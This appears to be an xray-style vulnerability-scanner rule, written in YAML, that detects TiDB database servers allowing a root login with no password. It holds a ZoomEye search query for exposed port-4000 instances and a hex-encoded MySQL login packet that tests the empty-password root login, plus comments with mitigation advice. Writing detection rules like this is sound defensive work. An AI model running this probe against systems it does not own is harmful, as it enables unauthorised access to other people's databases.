漏洞描述
TiDB server was able to be accessed because no authentication was required.
zoomeye-query: tidb +port:"4000"
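# xray-style POC: flags a TiDB instance that accepts a MySQL-protocol login
# without a password. The indentation of this document had been lost, which
# collapsed the nested mappings and left three sibling `expression` keys; the
# structure below is the one the rule semantics require (per-rule `expression`
# under r0/r1, a top-level `expression` combining them).
#
# `data` is a hex-encoded MySQL client login (HandshakeResponse). Its readable
# fields are visible in the hex: user `root`, an empty auth-response field,
# plugin name `mysql_native_password`, and libmysql-style connection
# attributes (`_client_name`/`libmysql`, `program_name`/`mysql`). The match
# bytes look like a MySQL OK packet (header 0x00, sequence 2), i.e. the server
# accepted the password-less login — confirm against a captured handshake.
#
# Mitigation when this matches: set a password for `root` and keep port 4000
# off untrusted networks. The probe is a normal `root` connection attempt, so
# it should be visible in the database's connection/audit logging if enabled.
id: tidb-unauth

info:
  name: TiDB - Unauthenticated Access
  author: lu4nx
  severity: high
  description: |
    TiDB server was able to be accessed because no authentication was required.
    zoomeye-query: tidb +port:"4000"
  tags: network,tidb,unauth
  created: 2022/07/20

# Two target forms: r0 uses the host as given in the target URL (port
# included, if any); r1 uses the bare domain and appends TiDB's default
# port 4000. Either matching is enough for the POC to report.
set:
  hostname: request.url.host
  host: request.url.domain

rules:
  r0:
    request:
      type: tcp
      host: "{{hostname}}"
      # MySQL login packet for user `root` with an empty password (see header).
      data: "b200000185a6ff0900000001ff0000000000000000000000000000000000000000000000726f6f7400006d7973716c5f6e61746976655f70617373776f72640075045f70696406313337353030095f706c6174666f726d067838365f3634035f6f73054c696e75780c5f636c69656e745f6e616d65086c69626d7973716c076f735f757365720578787878780f5f636c69656e745f76657273696f6e06382e302e32360c70726f6772616d5f6e616d65056d7973716c"
      read-size: 1024
    # Server answered with what looks like an OK packet: login accepted.
    expression: response.raw.bcontains(b'0700000200000002000000')
  r1:
    request:
      type: tcp
      host: "{{host}}:4000"
      # Same login packet as r0, sent to the default TiDB port.
      data: "b200000185a6ff0900000001ff0000000000000000000000000000000000000000000000726f6f7400006d7973716c5f6e61746976655f70617373776f72640075045f70696406313337353030095f706c6174666f726d067838365f3634035f6f73054c696e75780c5f636c69656e745f6e616d65086c69626d7973716c076f735f757365720578787878780f5f636c69656e745f76657273696f6e06382e302e32360c70726f6772616d5f6e616d65056d7973716c"
      read-size: 1024
    expression: response.raw.bcontains(b'0700000200000002000000')

# Report if either target form accepted the password-less login.
expression: r0() || r1()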